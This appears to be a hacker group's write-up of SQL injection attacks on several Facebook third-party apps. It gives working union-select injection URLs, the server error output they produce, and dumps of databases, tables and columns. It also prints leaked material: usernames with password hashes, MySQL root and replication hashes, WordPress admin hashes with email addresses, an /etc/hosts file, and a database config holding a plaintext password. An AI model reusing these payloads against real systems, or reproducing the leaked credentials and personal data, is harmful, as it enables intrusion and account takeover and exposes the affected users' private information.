/photo_search.php Disallow: /photos.php # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied. Sitemap: http://www.facebook.com/sitemap.php 00000000000000000000000000000000 nothing interesting =\ http://apps.facebook.com/tvshowchat/ I looked closely, I noticed links http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability... check: http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r ooooooooooooooooooooooooooo Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164 and other.... oooooooooooooooooooooooooooo O_o opsss! After sitting for a while, I realized that one of the servers is on MySql. Writing exploits, I got the following: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1 ooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 5.0.45-log <= ALERT!!! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... oooooooooooooooooooooooooooo Database : adminclt_testsite Database User : adminclt_13@209.68.2.10 MySQL Version : 5.0.67-log super = ] Now, we just can say that there is SQL Injection Vulnerability http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability] Now we know that there is MySql 5.0.45-log Then let's write another exploit to display tables with information_schema.tables: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1 oooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38 Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/ 201 <= ALERT!!! 201 tables! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... oooooooooooooooooooooooooooo http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r] Database : adminclt_testsite Database User : adminclt_13@209.68.2.10 MySQL Version : 5.0.67-log 1) AdCode 2) AdTrack 3) Admin_DataStore 4) Admin_User 5) Challenges 6) ChallengesCompleted 7) Comments 8) ContactEmails 9) Content 10) ContentImages 11) FeaturedTemplate 12) FeaturedWidgets 13) Feeds 14) FolderLinks 15) Folders 16) ForumTopics 17) Log 18) LogDumps 19) Newswire 20) NotificationMessages 21) Notifications 22) Orders 23) OutboundMessages 24) Photos 25) Prizes 26) RawExtLinks 27) RawSessions 28) SessionLengths 29) Sites 30) Subscriptions 31) SurveyMonkeys 32) SystemStatus 33) Templates 34) User 35) UserBlogs 36) UserCollectives 37) UserInfo 38) UserInvites 39) Videos 40) WeeklyScores 41) Widgets 42) cronJobs 43) fbSessions Admin_User 1) id 2) name 3) email 4) password 5) userid 6) ncUid 7) level User 1) userid 2) ncUid 3) name 4) email 5) isAdmin 6) isBlocked 7) votePower 8) remoteStatus 9) isMember 10) isModerator 11) isSponsor 12) isEmailVerified 13) isResearcher 14) acceptRules 15) optInStudy 16) optInEmail 17) optInProfile 18) optInFeed 19) optInSMS 20) dateRegistered 21) eligibility 22) cachedPointTotal 23) cachedPointsEarned 24) cachedPointsEarnedThisWeek 25) cachedPointsEarnedLastWeek 26) cachedStoriesPosted 27) cachedCommentsPosted 28) userLevel http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R] Current Database : signalpa_fbmFundRraise Database User : signalpa_rockaja@localhost MySQL Version : 5.0.85-community DATABASE 1) information_schema 2) signalpa_CelebrityPuzzle 3) signalpa_EBF 4) signalpa_appNotification 5) signalpa_appnetwork 6) signalpa_dailyscriptures 7) signalpa_ebayfeed 8) signalpa_fbmFundRraise 9) signalpa_fbmFundRraisebeta 10) signalpa_netcards 11) signalpa_paypal 12) signalpa_thepuzzle signalpa_fbmFundRraise 1) Campaigns 2) Campaigns_Temp 3) FB_theme 4) IfundDollars 5) Languages 6) Payments 7) Paymentsoops 8) Supporters 9) Users 10) Withdrawals 11) invites 12) invites_copy 13) mp_passwords 14) payment_codes 15) txt_codes 16) valid_servers 17) weeklyBonus Column: Users 1) id 2) name 3) email 4) mobile_no 5) address 6) country 7) password 8) organisation 9) date_created 10) date_updated 11) status 12) facebook_id 13) isFacebookFan 14) verify 15) paypalUse 16) paypalEmail 17) bacUse 18) bacAcc 19) bacName 20) bacLocation 21) bacCountry 22) bacIBAN 23) bacSort_code 24) current_rank 25) new_rank 26) cronjob 27) max_fundraise Column: mp_passwords 1) id 2) password 3) username 4) status 5) number 6) rc 7) referer 8) transID 9) currency 10) transType 11) amount 12) confirmed 13) date signalpa_paypal 1) paypal_cart_info 2) paypal_payment_info 3) paypal_subscription_info [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783: [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023: [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59: Column: paypal_cart_info 1) txnid 2) itemname 3) itemnumber 4) os0 5) on0 6) os1 7) on1 8) quantity 9) invoice 10) custom Column : paypal_payment_info 1) firstname 2) lastname 3) buyer_email 4) street 5) city 6) state 7) zipcode 8) memo 9) itemname 10) itemnumber 11) os0 12) on0 13) os1 14) on1 15) quantity 16) paymentdate 17) paymenttype 18) txnid 19) mc_gross 20) mc_fee 21) paymentstatus 22) pendingreason 23) txntype 24) tax 25) mc_currency 26) reasoncode 27) custom 28) country 29) datecreation http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R] Current Database : tv Database User : tomkincaid@ps5008.dreamhost.com MySQL Version : 5.0.45-log DATABASES 1) information_schema 2) astro 3) candukincaid 4) cemeteries 5) churchwpdb 6) countdownapp 7) crush 8) dare 9) friendiq 10) giants 11) hookup 12) jauntlet 13) loccus 14) luciacanduwp 15) maps 16) martisor 17) mediax 18) mostlikely 19) music 20) pimpfriends 21) plans 22) politicsapp 23) postergifts 24) posters2 25) projectbasecamp 26) pwnfriends 27) quiz 28) seeall 29) send 30) supporter 31) swapu 32) tomsapps 33) travelbug tab.send 1) app 2) item 3) itemforuser 4) neverblue 5) user Columns user(12454) 1) userid 2) siteid 3) appkey 4) session 5) points 6) added 7) removed Tab. candukincaid 1) wp_comments 2) wp_links 3) wp_options 4) wp_post**** 5) wp_posts 6) wp_px_albumPhotos 7) wp_px_albums 8) wp_px_galleries 9) wp_px_photos 10) wp_px_plugins 11) wp_term_relationships 12) wp_term_taxonomy 13) wp_terms 14) wp_user**** 15) wp_users Column wp_users 1) ID 2) user_login 3) user_pass 4) user_nicename 5) user_email 6) user_url 7) user_registered 8) user_activation_key 9) user_status 10) display_name etc... http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r] > ~ inj3ct0r_facebook_exploit [ENTER] root:*368C08021F7260A991A9D8121B7D7808C99BBB8A slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407 muu:*74A45B921A1A918B18AE9B137396E5A67E006262 monitor:*1840AE2C95804EC69321D1EE33AADFA249817034 maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220 http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r] Database: affinispac_fb User: affinispac_fb@localhost Version: 5.0.67-community http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r] >plucky@localhost : facebook : 4.0.13-log etc... =] Next xD Database: thetvdb User: thetvdb@localhost Version: 5.0.51a-24-log [Database]: thetvdb [1]aka_seriesname [2]apiusers [3]banners [4]deletions [5]genres [6]imgstatus [7]languages [8]mirrors [9]networks [10]ratings [11]runtimes [12]seriesactors [13]seriesupdates [14]translation_episodename [15]translation_episodeoverview [16]translation_labels [17]translation_seriesname [18]translation_seriesoverview [19]tvepisodes [20]tvseasons [21]tvseries [22]user_episodes [23]users users: id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites, favorites_displaymode,bannerlimit,banneragreement,active,uniqueid, lastupdatedby_admin,mirrorupdate [userpass] [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E: [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D: [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790: [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E: [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B: [6] 3d801aa532c1cec3ee82d87a99fdf63f [Database]: wiki [24]archive [25]categorylinks [26]externallinks [27]filearchive [28]hitcounter [29]image [30]imagelinks [31]interwiki [32]ipblocks [33]job [34]langlinks [35]logging [36]math [37]objectcache [38]oldimage [39]page [40]page_restrictions [41]pagelinks [42]querycache [43]querycache_info [44]querycachetwo [45]recentchanges [46]redirect [47]revision [48]searchindex [49]site_stats [50]templatelinks [51]text [52]trackbacks [53]transcache [54]user [55]user_groups [56]user_newtalk [57]watchlist user: user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time, user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token, user_email_token_expires,user_registration,user_editcount ['user_name'] : ['user_pass'] [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783: [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023: [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59: [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87: [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f: [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4: [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c: [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5: [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5: [10] Bsudbury: [10] 827d07956629c37855f3518374821872: [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf: [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29: [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc: [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa: [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2: [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd: [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95: [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be: [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b: [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba: [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029: [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026: [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0: [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19: [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1: [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b: [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f: [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee: [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03: [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced: [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1: [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c: [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d: [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448: [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb: [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46: [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa: [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7: [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27: [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412: [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07: [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6: [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765: [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76: [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b: [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814: [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec: [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5: [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d: [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8: [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319: [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9: [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40: [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb: [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607: [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52: [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1: [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a: [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da: [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580: [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb: [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c: [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed: [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453: [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714: [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492: [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161: [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43: [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874: [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731: [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d: [72] Searlea: [72] 058beaa0d231d457136015119da5aa34: [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c: [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975: [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd: [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8: [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540: [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba: [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf: [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2: [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a: [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc: [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f: [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51: [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5: [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e: [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301: [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c: [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370: [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8: [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd: [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740: [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74: [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128: [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b: [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868: --------------------------------------------------------------------------------------------------------------------------------------------------- read /etc/hosts 127.0.0.1 localhost localhost.localdomain 192.168.1.167 140696-db2.flufffriends.com 140696-db2 192.168.1.166 140695-db1.flufffriends.com 140695-db1 192.168.1.165 140694-web2.flufffriends.com 140694-web2 192.168.1.164 140693-web1.flufffriends.com 140693-web1 69.63.176.141 api.facebook.com 208.116.17.80 peanutlabs.com ---------------------------------- /etc/my.cnf #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1 log-bin=/var/lib/mysqllogs/bin-log binlog-do-db=fluff2 expire-logs-days=14 server-id = 5 #master-host=69.63.176.141 #master-user=romis_user #master-password=romis0123 #master-connect-retry=60 replicate-do-db=miserman #log-slave-updates expire_logs_days = 14 I think we found a sufficient number of vulnerabilities! --------------------------- __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\_\L\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ So .. Moving on to the fun friends To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =] ..> Exploit start . + . + . + . + . + . + . wp_posts post_password wp_users user_pass done..... WordPress! oO one of the modules installed in facebook is Wordpress! check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1 oooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67 3 <= ALERT! Users! =] Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124 oooooooooooooooooooooooooooo ..> Crach_exploit [ENTER] user: admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. cracker: admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com see request: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1-- goOd =] Nice Hacking old school xD __ __ __ __ /'__`\ /'__`\/\ \\ \ /\ \/\ \ __ _/\ \/\ \ \ \\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ \ \ \_\ \/> </\ \ \_\ \ \__ ,__\ \ \____//\_/\_\\ \____/\/_/\_\_/ \/___/ \//\/_/ \/___/ \/_/ [Conclusion] There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! (Alpha zone Exploit Database) __ __ ______ /'__`\ /'__`\/\ ___\ /\ \/\ \ __ _/\ \/\ \ \ \__/ \ \ \ \ \/\ \/'\ \ \ \ \ \___``\ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Greetz] Greetz all Member Alpha zone GoOd luck Hackers! =] https://www.facebook.com/AlphaZoneOfficial like us ^